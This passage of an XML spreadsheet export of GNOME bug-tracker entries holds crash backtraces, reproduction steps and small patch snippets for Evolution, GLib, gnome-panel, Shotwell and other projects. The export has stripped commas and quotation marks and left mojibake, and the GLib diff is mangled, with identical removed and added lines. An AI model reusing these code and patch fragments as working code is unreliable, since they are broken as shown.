#48 0x0809d81d in main () at eval.c:41
#49 0x40ec1507 in __libc_start_main (main=0x809d638  argc=3 
    ubp_av=0xbffffaf4 init=0x8066214  fini=0x80d3630  
    rtld_fini=0x4000dc14  stack_end=0xbffffaec)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40f5f669 in __wait4 () from /lib/i686/libc.so.6
#0  0x40f5f669 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40fdb154 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x40e9a523 in waitpid (pid=2400 stat_loc=0xbfffe02c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffe02c
options = 0
result = 0
oldtype = 0
#3  0x409247b2 in gnome_segv_handle (signum=11) at gnome-init.c:664
	in gnome-init.c
estatus = 1087418095
in_segv = 1
pid = 0
#4  0x0809d5ed in message_browser_get_type () at eval.c:41
	in eval.c
ap = (void **) 0xbfffe0ec
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0xbfffe170 \177\003Ã¿Ã¿ \001Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿\200Â¡Ã§@#
result = 3221217516
result = 3221217648
#5  0x40e988d5 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135494448 esi = 1133492828 ebp = 3221218312 esp = 3221218284 ebx = 2379 edx = 1089091064 ecx = 32 eax = 0 trapno = 0 err = 0 eip = 1089288705 cs = 35 __csh = 0 eflags = 2097682 esp_at_signal = 3221218284 ss = 43 __ssh = 0 fpstate = 0xbfffe170 oldmask = 2147483648 cr2 = 0}) at signals.c:97
	in signals.c
signo = 0
__value = 0xfffffe00 
#6  
No locals.
#7  0x40ed3a01 in __kill () from /lib/i686/libc.so.6
No locals.
Unknown reporter: steve.komosa@dsl.pipex.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>steve.komosa</t>
  </si>
  <si>
    <t>SHOTWELL-716025</t>
  </si>
  <si>
    <t>debug build crashes on startup</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by adam@yorba.org 2010-03-02 15:00:00 -0800 ----
Original Redmine bug id: 1501
Original URL: http://redmine.yorba.org/issues/1501
Searchable id: yorba-bug-1501
Original author: Adam Dingle
Original description:
If I configure Shotwell with --debug and then build Shotwell crashes on
startup. This behavior is new with Vala 0.7.10.
---- Additional Comments From shotwell-maint@gnome.bugs 2013-05-01 11:40:00 -0700 ----
### History
####
#1
Updated by Adam Dingle over 3 years ago
  * **Status** changed from _Open_ to _Review_
  * **Assignee** changed from _Anonymous_ to _Allison Barlow_
The crash is due to this Vala bug:
https://bugzilla.gnome.org/show_bug.cgi?id=611716
To fix this we'll need to change this line in Resources.vala which triggers
the bug:
    public const string HELP_URL = Ã¢â‚¬Å“!http://trac.yorba.org/wiki/UsingShotwellÃ¢â‚¬Â +
    APP_VERSION.substring(0 3)
####
#2
Updated by Allison Barlow over 3 years ago
  * **Status** changed from _Review_ to _5_
  * **Resolution** set to _fixed_
  * **% Done** set to _100_
####
#3
Updated by Charles Lindsay 7 months ago
  * **Status** changed from _5_ to _Fixed_
--- Bug imported by chaz@yorba.org 2013-11-25 21:44 UTC  ---
This bug was previously known as _bug_ 1501 at http://redmine.yorba.org/show_bug.cgi?id=1501
Unknown Component 
   Using default product and component set in Parameters 
Unknown version  in product shotwell. 
   Setting version to !unspecified.
Unknown milestone unknown in product shotwell. 
   Setting to default milestone for this product ---.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>SOUND-JUICER-131736</t>
  </si>
  <si>
    <t>sound-juicer GConf entries not uninstalled when package is removed</t>
  </si>
  <si>
    <t>sound-juicer GConf keys are not uninstalled prior to package removal.
%preun
export GCONF_CONFIG_SOURCE=`gconftool-2 --get-default-source`
gconftool-2 --makefile-uninstall-rule \
   %{_sysconfdir}/gconf/schemas/sound-juicer.schemas &gt;/dev/null</t>
  </si>
  <si>
    <t>GEDIT-349198</t>
  </si>
  <si>
    <t>Unable to define accelerators on language highlighting menus</t>
  </si>
  <si>
    <t>When editable menu accelerators is on the whole gedit menus but the syntax highlithing ones are editable. You can't set a custom accelerator on a particular syntax file.
Being able to do so would be handy for commonly used syntax files like the C or the XML ones or for commonly mistaken types (Ruby lovers know the .rhtml one). I see no reason why we shouldn't be able to edit those shortcuts.</t>
  </si>
  <si>
    <t>GEGL-502554</t>
  </si>
  <si>
    <t>Build failure with gegl-0.0.14 - missing envelopes.h</t>
  </si>
  <si>
    <t>Please describe the problem:
gegl-0.0.14 tarball is missing envelopes.h in 'operation/workshops' causing the build to fail doesn't contain as below
&gt;&gt;
make[4]: Entering directory `/home/deji/rpmbuild/BUILD/gegl-0.0.14/operations/workshop'
box-max.so
box-percentile.so
make[4]: *** No rule to make target `envelopes.h' needed by `c2g.so'.  Stop.
&lt;&lt;
Including envelopes.h from svn moves the build pass that point but then fails to compile gluas.c with lua-5.1.2 in Fedora 8. The failure is fixed with the attached patch. 
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-246700</t>
  </si>
  <si>
    <t>ACC:Evolution crash when click Esc to exit the Active Connection dialog.</t>
  </si>
  <si>
    <t>Steps to reproduce the problem:
1. Start evolution.
2. Click Alt + F to open the file menu.
3. Click W to open Active Connection dialog.
4. Click Esc to exit the Active Connection dialog.
Actual Results:
Evolution crashed.
Expected Results:
The Active connection dialog should be closed.
How often does this happen? 
always
Additional Information:
Accessibility is turned on and see the attachment for the backtrace.</t>
  </si>
  <si>
    <t>GLIB-69474</t>
  </si>
  <si>
    <t>g_strdup_vprintf core dump</t>
  </si>
  <si>
    <t>g_strdup_vprintf uses g_printf_string_upper_bound to
determine the required buffer size to accomodate the
resulting string.
The implementation of g_printf_string_upper_bound that uses
vsnprintf returns the number of _characters_ that would
have been written excluding the '\0' because that's what
vsnprintf returns (tested on both Solaris 8 and Linux glibc 2.2.2).
So in case of g_strdup_vprintf(format =  args) it will
return 0.
If the returned upper bound is 0 then g_new will return
NULL and vsprintf into NULL will result in seg. fault.
In other cases it will result in seg. fault or malfunction.
Suggested fix:
diff -u -r1.39 gmessages.c
--- gmessages.c	6 Dec 2001 22:37:05 -0000	1.39
+++ gmessages.c	23 Jan 2002 18:08:30 -0000
@@ -11747 +11747 @@
 {
 #if HAVE_C99_VSNPRINTF
   gchar c
-  return vsnprintf (
+  return vsnprintf (
 #else
   return printf_string_upper_bound (format TRUE args)
 #endif</t>
  </si>
  <si>
    <t>GNOME-USER-DOCS-329060</t>
  </si>
  <si>
    <t>Shutdown/Hibernate/Suspend options not documented for the logout dialogue</t>
  </si>
  <si>
    <t>Please describe the problem:
Forwarding from the Ubuntu bug tracking System:
https://launchpad.net/distros/ubuntu/+source/ubuntu-docs/+bug/19428
I am using breezy. My machine is an AMD Athlon 2200+ if that's relevant.
Here's a use case scenario.
User hits System-&gt;Log Out.
Options seen on my machine are:
* log out
* shutdown
* reboot
* hibernate
* PLUS: save current setup option.
User doesn't know what hibernate means unless we are talking about bears.
User hits Help button.
There is information only on the Log Out option.
************************************************
While the reboot &amp; shutdown option are fairly self-evident the hibernate option
isn't. I'm a fairly advanced user and I wasn't too sure.
There needs to be information on what hibernate is what it does the power it
consumes compared to shutting down and the pros &amp; cons for hibernate vs
shutting down.
Also information about the save current setup option would be handy.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNUMERIC-121877</t>
  </si>
  <si>
    <t>Font menu does not have scrollbars</t>
  </si>
  <si>
    <t>If too many fonts are installed in the system the font menu does not fit
on the screen in Gnumeric 1.1.x.  There are no scrollbars in the menu or
the torn-off version of the menu.  This makes selecting fonts further down
the list impossible.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-320745</t>
  </si>
  <si>
    <t>Keyboard volume control does not work when applet slider is showing</t>
  </si>
  <si>
    <t>Version details: 2.10.2
Distribution/Version: Debian Unstable
After clicking on the volume control applet to the single Master slider is shown
as a kind of popup the keyboard-bound volume control buttons don't work. After
closing the slider by choosing a volume or clicking away the keyboard controls
work again. The volume control buttons work fine when the full Volume Control
window is open.
Steps to reproduce:
1. Click on volume control applet.
2. Press keyboard-bound volume control button.
Experienced behaviour:
  Volume does not change.
Expected behaviour:
  Volume should change and the slider be updated live (as with the Master
channel when the full Volume Control window is open).</t>
  </si>
  <si>
    <t>EVOLUTION-244477</t>
  </si>
  <si>
    <t>Custom Categories are *not* imported during upgrade</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Customized categories from earlier version 1.2.4 are not shown in master
category list on upgrade.  Individual contacts still retain their categroy
information but the master list needs to be manually edited.
Steps to reproduce the problem:
1. upgrade beyond 1.2.4
2. open contact editor category list
3. 
Actual Results:
the master category list only shows the ximian defaults not the customized
values that I had previously entered.
Expected Results:
Expect upgrade to not overwrite its defaults over my data
How often does this happen? 
everytime Itried to upgrade to 1.3.92 or 1.4.0
Additional Information:
after downgrading to 1.2.4 the customized list is instantly available
appears that 1.3.92 and 1.4.0 are not overwriting my custom list just
ignoring it.</t>
  </si>
  <si>
    <t>rsanford</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-155671</t>
  </si>
  <si>
    <t>[Patch] Gnome-About-Me new capplet</t>
  </si>
  <si>
    <t>this patches implement a new capplet that integrates with EDS lets the user
change informtation related to itself including the password.</t>
  </si>
  <si>
    <t>GTK+-787279</t>
  </si>
  <si>
    <t>EmojiChooser: Hovered emoji become impossible to see in HighContrast/Inverse</t>
  </si>
  <si>
    <t>Created attachment 359135
screenshot of hovered emoji in HighContrast
We're giving them the $selected_bg_color but leaving the fg colour as-is which is disastrous in the HighContrast themes: in the light variant any non-hicolour emoji completely disappears and in HighContrastInverse it's only barely visible.
It seems worth noting that Adwaita may suffer from this too for colour emoji whose colours don't coincide nicely with the $selected_bg_color.
The obvious fix is just to set color: $selected_fg_color which will fix HC and bring both themes in sync with how e.g. hovered menu items look. Hopefully this can't break anything else somehow.</t>
  </si>
  <si>
    <t>dboles.src</t>
  </si>
  <si>
    <t>PYGTK-308099</t>
  </si>
  <si>
    <t>No GtkWidget proxy handler for do_size_allocate</t>
  </si>
  <si>
    <t>(define-virtual size_allocate
  (of-object GtkWidget)
gives
/* overriding do_size_allocate is currently not supported */
gjc mentions bug #132704 as an example of the kind of hack that might be required
Bear in mind that fixing this without fixing bug #308097 will suddenly cause
do_size_allocate() to be called twice in custom widgets and chaining up to the
parent size_allocate() will break</t>
  </si>
  <si>
    <t>EVOLUTION-329577</t>
  </si>
  <si>
    <t>A/c creation page mnemonics Issue</t>
  </si>
  <si>
    <t>1. Edit-&gt;Preferences
2. New Account
3. Give details for first page
4. Give details for Receiving page. Use Alt+M  to remember password. It keeps shifting the focus to hidden place rather than check/uncheck it.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-332810</t>
  </si>
  <si>
    <t>Dragging a color to the desk replaces the wallpaper in the list</t>
  </si>
  <si>
    <t>Please describe the problem:
If you drag a color on the desktop while a wallpaper is selected in the opened
backgrounds dialog the wallpaper is replaced in the list by that color.
Steps to reproduce:
1. Open the backgrounds properties dialog
2. Select a wallpaper (You don't need to apply it)
3. Drag a color on the desktop e.g. from any color selector.
Actual results:
In the list of wallpapers the selected background is replaced by that color. The
only way to get the wallpaper back is to readd it.
Expected results:
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>umarmung</t>
  </si>
  <si>
    <t>GLADE-LEGACY-88020</t>
  </si>
  <si>
    <t>Window-opening suggestion</t>
  </si>
  <si>
    <t>Right now when you fire up Glade 1.1.0 at least using metacity you get
three windows opening right on top of each other: Properties on top
Palette second and Project window at the bottom.
Since you *have* to do something in the initially-buried Project window to
make anything in the Properties or Palette window active suggest it would
be better not to open those two windows until you'd created or opened a
project. 
(In fact it would be nice if all the windows' positions were saved as part
of the project but that's another matter...)</t>
  </si>
  <si>
    <t>GNOME-MEDIA-92667</t>
  </si>
  <si>
    <t>Once hidden the toolbar cannot be restored</t>
  </si>
  <si>
    <t>I'm running Sun's beta 2 build 6 version Gnome sources (27th Aug snapshot
from CVS)
When I right click on the toolbar (towards the righthand side after the
toolbar buttons) I get a popup menu. This popup menu is not invokable with
the keyboard.
Also the 'Play' 'Record' 'Stop' options are available only in the
toolbar and not in the menu. Since toolbar is not keynavigable as yet the
options cannot be invoked with the keyboard.</t>
  </si>
  <si>
    <t>ORCA-645474</t>
  </si>
  <si>
    <t>Orca should provide the option of performing a Say All when WebKitGtk content is loaded</t>
  </si>
  <si>
    <t>We do it for Gecko apps (including Gecko-based Yelp). We need to do it for WebKitGtk apps (including WebKitGtk-based Yelp).
And because we do it for Gecko apps we can add this:
* WITHOUT new strings
* WITHOUT new gui components
Thanks to the miracle that is copying and pasting.</t>
  </si>
  <si>
    <t>WEBSITE-333500</t>
  </si>
  <si>
    <t>List screenshots on my account page</t>
  </si>
  <si>
    <t>On the account page the submissions section lists theme &amp; background but it doesn't list screenshot. It should IMHO.</t>
  </si>
  <si>
    <t>GLIB-54946</t>
  </si>
  <si>
    <t>need a g_object_newv function</t>
  </si>
  <si>
    <t>It would be very useful to have a g_object_newv function in libgobject. 
The existing g_object_new and g_object_new_valist are inapropriate in cases
where you can't use a C varargs function (eg. language bindings or maybe a
GUI builder).
The contents of the g_object_new_valist is non trivial and accesses a few
structure members that are marked private so it doesn't seem safe for a
user of the library to reimplement this function without the use of valists.</t>
  </si>
  <si>
    <t>GNOME-VFS-136173</t>
  </si>
  <si>
    <t>Error compile with gtk+-2.3.5</t>
  </si>
  <si>
    <t>Read ChangeLog gtk+2.5.5 from 2004-02-27.
Module(Subdir) gtk (error compile )
gnome_vfs_...._add_bookmark renamed to gnome_vfs_..._insert_bookmark where
parameter position=-1.
Sory my bad english.</t>
  </si>
  <si>
    <t>GNOME-PANEL-98565</t>
  </si>
  <si>
    <t>panel crushing on startup</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-panel
Severity: normal
Version: 2.0.10
Synopsis: panel crushing on startup
Bugzilla-Product: gnome-panel
Bugzilla-Component: Panel
BugBuddy-GnomeVersion: 2.0 (2.0.5)
Description:
Description of Problem:
Panel crushes whenever I try starting it.
Steps to reproduce the problem:
1. Run gnome-panel
2. 
3. 
Actual Results:
Crashes
Expected Results:
Displays pretty buttons
How often does this happen?
Every time.
Additional Information:
----- RELOADING FOLDER: Games -----
----- RELOADING FOLDER: Graphics -----
----- RELOADING FOLDER: Internet -----
----- RELOADING FOLDER: Multimedia -----
----- RELOADING FOLDER: Office -----
----- RELOADING FOLDER: Preferences -----
----- RELOADING FOLDER: Advanced -----
----- RELOADING FOLDER: Sawfish -----
----- RELOADING FOLDER: Accessibility -----
----- RELOADING FOLDER: System -----
----- RELOADING FOLDER: System -----
No object_type set for panel object with ID
7t1025504983ut981368u1000p13246r5776                    
50163k3221219376
Unable to open desktop file
file:///home/kofman/.gnome2/panel2.d/default/launche                    
rs/hammer-005936f31f.desktop for panel launcher: Error reading file
'file:///hom                    
e/kofman/.gnome2/panel2.d/default/launchers/hammer-005936f31f.desktop':
File not                      found
Unable to open desktop file
file:///home/kofman/.gnome2/panel2.d/default/launche                    
rs/eek-006161d547.desktop for panel launcher: Error reading file
'file:///home/k                    
ofman/.gnome2/panel2.d/default/launchers/eek-006161d547.desktop': File
not found
Unable to open desktop file
file:///home/kofman/.gnome2/panel2.d/default/launche                    
rs/curly-0044c5c37e.desktop for panel launcher: Error reading file
'file:///home                    
/kofman/.gnome2/panel2.d/default/launchers/curly-0044c5c37e.desktop':
File not f                     ound
Unable to open desktop file
file:///home/kofman/.gnome2/panel2.d/default/launche                    
rs/curly-0056bc0d94.desktop for panel launcher: Error reading file
'file:///home                    
/kofman/.gnome2/panel2.d/default/launchers/curly-0056bc0d94.desktop':
File not f                     ound
** ERROR **: file panel-applet-frame.c: line 314
(panel_applet_frame_get_backgro                     und_string): should
not be reached
aborting...
Debugging Information:
Backtrace was generated from '/usr/bin/gnome-panel'
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...[New Thread 16384 (LWP 2915)]
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...0x409942e9
in wait4 ()
   from /lib/libc.so.6
#0  0x409942e9 in wait4 () from /lib/libc.so.6
#1  0x40a06704 in sys_sigabbrev () from /lib/libc.so.6
#2  0x4084fc84 in waitpid () from /lib/libpthread.so.0
#3  0x40174723 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x408515cb in __pthread_sighandler () from /lib/libpthread.so.0
#5  0x4091fb88 in sigaction () from /lib/libc.so.6
#6  0x4084dcab in raise () from /lib/libpthread.so.0
#7  0x40920c3e in abort () from /lib/libc.so.6
#8  0x408bbe00 in g_logv () from /usr/lib/libglib-2.0.so.0
#9  0x408bbead in g_log () from /usr/lib/libglib-2.0.so.0
#10 0x08091e07 in panel_applet_frame_change_size ()
#11 0x08092cbc in panel_applet_frame_get_type ()
#12 0x08092d29 in panel_applet_frame_construct ()
#13 0x08092f8d in panel_applet_frame_new ()
#14 0x08091ab6 in panel_applet_frame_load ()
#15 0x0809192b in panel_applet_frame_load_from_gconf ()
#16 0x08074e24 in panel_applet_menu_set_recurse ()
#17 0x408b7246 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
#18 0x408b4b29 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#19 0x408b5947 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#20 0x408b5d23 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#21 0x408b63ff in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#22 0x4035733f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#23 0x0805bb50 in main ()
#24 0x4090e9d3 in __libc_start_main () from /lib/libc.so.6
Thread 1 (Thread 16384 (LWP 2915)):
#0  0x409942e9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40a06704 in sys_sigabbrev () from /lib/libc.so.6
No symbol table info available.
#2  0x4084fc84 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40174723 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x408515cb in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x4091fb88 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x4084dcab in raise () from /lib/libpthread.so.0
No symbol table info available.
#7  0x40920c3e in abort () from /lib/libc.so.6
No symbol table info available.
#8  0x408bbe00 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x408bbead in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x08091e07 in panel_applet_frame_change_size ()
No symbol table info available.
#11 0x08092cbc in panel_applet_frame_get_type ()
No symbol table info available.
#12 0x08092d29 in panel_applet_frame_construct ()
No symbol table info available.
#13 0x08092f8d in panel_applet_frame_new ()
No symbol table info available.
#14 0x08091ab6 in panel_applet_frame_load ()
No symbol table info available.
#15 0x0809192b in panel_applet_frame_load_from_gconf ()
No symbol table info available.
#16 0x08074e24 in panel_applet_menu_set_recurse ()
No symbol table info available.
#17 0x408b7246 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#18 0x408b4b29 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#19 0x408b5947 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#20 0x408b5d23 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#21 0x408b63ff in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#22 0x4035733f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x0805bb50 in main ()
No symbol table info available.
#24 0x4090e9d3 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x409942e9 in wait4 () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-11-15 01:59 -------
The original reporter (kofman@uiuc.edu) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>kofman</t>
  </si>
  <si>
    <t>EVOLUTION-528816</t>
  </si>
  <si>
    <t>evolution ignores timezone info when importing ics calendars</t>
  </si>
  <si>
    <t>Please describe the problem:
When importing ics calendar files from File-&gt;Import.. evolution doesn't care of timezone information for the events and threats each timestamp as local time ending up with wrong event start/end time.
Steps to reproduce:
1. download http://www.google.com/calendar/ical/gsummerofcode%40gmail.com/public/basic.ics
2. open it with a text editor and note that each event has a TZID that contains timezone information for the timestamp
3. import it to evolution and you will see that each timestamp has been taken as local time ignoring timezone
Actual results:
Expected results:
Each timestamp should be converted to local time basing on timezone data
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>fargiolas</t>
  </si>
  <si>
    <t>HIPO-475574</t>
  </si>
  <si>
    <t>hipo translation problems</t>
  </si>
  <si>
    <t>pedro i love you.
nevertheless you make mistakes!
but we're all human:
#: ../src/ImportDialog.cs:95
# csharp-format
msgid Adding {0} of {0}
#: ../src/ImportDialog.cs:97
# csharp-format
msgid Adding {0} of {1}
#: ../src/HipoMainWindow.cs:807
# csharp-format
msgid {0} {1} Properties
#: ../src/HipoMainWindow.cs:923
# csharp-format
msgid {0} Properties
#: ../src/HipoMainWindow.cs:1109
# csharp-format
msgid Used {0} of {1}
what is {0} and {1} here? what kind of noun or a number? plural or singular? otherwise it's hard to translate these properly...
please add translator comments to each of these strings:
http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#use-comments
#: ../src/HipoMainWindow.cs:722
msgid Do you really want to remove the song/s?
hmm ugly because some languages even have more than two plural forms. any chance to add proper ngettext support here?
#: ../src/HipoMainWindow.cs:107
msgid _Add File...
#: ../src/HipoMainWindow.cs:109
msgid Add Folder...
hmm the second one does not have a mnemonic?</t>
  </si>
  <si>
    <t>GSTREAMER-711437</t>
  </si>
  <si>
    <t>apev2mux: should not put APEv2 tags at beginning of WavPack files</t>
  </si>
  <si>
    <t>I have been testing Banshee 2.6.0-2linuxmint1 and found that WavPack files
created from CDs contain APEv2 tags at the beginning of the files. This is
counter to the WavPack specs and causes the files to be unplayable on players
that use FFmpeg (like VLC) and most other software (except Banshee). Players
that use libwavpack directly can play the files because it skips the tags but
does not recognize the tag data at that location.
Please see section 4.0 of the WavPack format documentation at
http://www.wavpack.com/file_format.txt - here is an excerpt:
Both the APEv2 tags and/or ID3v1 tags must come at the end of the
WavPack file with the ID3v1 coming last if both are present.
I have also filed this bug against Banshee but believe that it is using apev2mux to place the tags here so am filing this against GStreamer as well.
Thanks!</t>
  </si>
  <si>
    <t>EVOLUTION-272179</t>
  </si>
  <si>
    <t>crash filtering incoming mail.</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Novell Linux Desktop 9 (i586)
Package: Evolution
Priority: Normal
Version: GNOME2.6. 2.1.4
Gnome-Distributor: Novell Inc.
Synopsis: crash filtering incoming mail.
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Bugzilla-Version: 2.1.4
BugBuddy-GnomeVersion: 2.0 (2.6.0)
Description:
Hit send/recieve ... bang :-)
I have:
evolution-2.1.4.0.200502021556-0.snap.novell.0.1
evolution-devel-2.1.4.0.200502021556-0.snap.novell.0.1
evolution-data-server-devel-1.1.4.0.200502021556-0.snap.novell.0.1
evolution-data-server-1.1.4.0.200502021556-0.snap.novell.0.1
Debugging Information:
Backtrace was generated from '/opt/gnome/bin/evolution'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 23552)]
[New Thread 32769 (LWP 23565)]
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 23552)]
[New Thread 32769 (LWP 23565)]
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 23552)]
[New Thread 32769 (LWP 23565)]
[New Thread 16386 (LWP 23566)]
[New Thread 32771 (LWP 23567)]
[New Thread 49156 (LWP 23568)]
[New Thread 65541 (LWP 23598)]
[New Thread 81926 (LWP 23599)]
[New Thread 98311 (LWP 23623)]
[New Thread 114696 (LWP 23624)]
[New Thread 147465 (LWP 23752)]
0x410171bb in waitpid () from /lib/libpthread.so.0
#0  0x410171bb in waitpid () from /lib/libpthread.so.0
#1  0x404fe0dc in __JCR_LIST__ () from /opt/gnome/lib/libgnomeui-2.so.0
#2  0x00000001 in ?? ()
#3  0x404c3f3a in libgnomeui_segv_handle ()
   from /opt/gnome/lib/libgnomeui-2.so.0
#4  0x0806581d in segv_redirect (sig=11) at main.c:431
#5  0x41015e51 in __pthread_sighandler () from /lib/libpthread.so.0
#6  
#7  0x412f629a in poll () from /lib/libc.so.6
#8  0x411ec558 in g_main_context_iterate ()
   from /opt/gnome/lib/libglib-2.0.so.0
#9  0x411ed7b7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
#10 0x408824d0 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#11 0x08065e50 in main (argc=1 argv=0xbfffeff4) at main.c:613
Thread 10 (Thread 147465 (LWP 23752)):
#0  0x410120c4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x41010f38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x41013ed9 in __pthread_alt_lock () from /lib/libpthread.so.0
No symbol table info available.
#3  0x410107cc in pthread_mutex_lock () from /lib/libpthread.so.0
No symbol table info available.
#4  0x08065885 in segv_redirect (sig=11) at main.c:440
No locals.
#5  0x41015e51 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#6  
No symbol table info available.
#7  0x41701e24 in camel_search_header_match (value=0x0 
    match=0x946b398 cvs-commits-list how=CAMEL_SEARCH_MATCH_EXACT 
    type=CAMEL_SEARCH_TYPE_MLIST default_charset=0x0)
    at camel-search-private.c:427
	name = 0x940f3c4 \020Ã¥Âª\b\004
	addr = 0x416ee79a
\203Ã„\020\211EÃ¼Ã«\024\203Ã¬\bÃ¿u\fÃ¿u\bÃ¨9Ã¾Ã¿Ã¿\203Ã„\020\211EÃ¼\213EÃ¼Ã‰ÃƒU\211Ã¥\203Ã¬\b\213E\b\2038
	truth = 0
	i = 1097982576
	cia = (CamelInternetAddress *) 0x0
	v = 0x416ee5f5 [\201Ãƒ{Ã¼\002
	vdom = 0xbe9ff6dc &lt;Ã·\237Â¾\205SnA
	mdom = 0x41358ce0 
#8  0x416e5385 in check_header (f=0x9580388 argc=2 argv=0xbe9ff790 
    fms=0xbe9ff944 how=CAMEL_SEARCH_MATCH_EXACT) at
camel-filter-search.c:159
	list = 0x0
	name = 0x9507490 x-camel-mlist
	matched = 0
	r = (ESExpResult *) 0x401e6af4
	i = 1
#9  0x416e5564 in header_matches (f=0x9580388 argc=2 argv=0xbe9ff790
    fms=0xbe9ff944) at camel-filter-search.c:206
No locals.
#10 0x401e6c48 in e_sexp_term_eval (f=0x9580388 t=0x945ae70) at
e-sexp.c:710
	r = (struct _ESExpResult *) 0x0
	i = 2
	argv = (struct _ESExpResult **) 0xbe9ff790
#11 0x416e59a3 in match_all (f=0x9580388 argc=1 argv=0x89928a8 
    fms=0xbe9ff944) at camel-filter-search.c:323
	r = (ESExpResult *) 0x93fe5c8
#12 0x401e6b9e in e_sexp_term_eval (f=0x9580388 t=0x945ae80) at
e-sexp.c:700
	r = (struct _ESExpResult *) 0x0
	i = 0
	argv = (struct _ESExpResult **) 0x8052b0c
#13 0x401e5ab7 in term_eval_and (f=0x9580388 argc=1 argv=0x9434d80 
    data=0x402b02e0) at e-sexp.c:255
	r = (struct _ESExpResult *) 0x93fe5c8
	r1 = (struct _ESExpResult *) 0x87325d0
	ht = (GHashTable *) 0x943f920
	lambdafoo = {count = -1096812340 uids = 0x28}
	type = -1
	bool = 1
	i = 0
#14 0x401e6b9e in e_sexp_term_eval (f=0x9580388 t=0x945ad90) at
e-sexp.c:700
	r = (struct _ESExpResult *) 0x0
	i = 0
	argv = (struct _ESExpResult **) 0x0
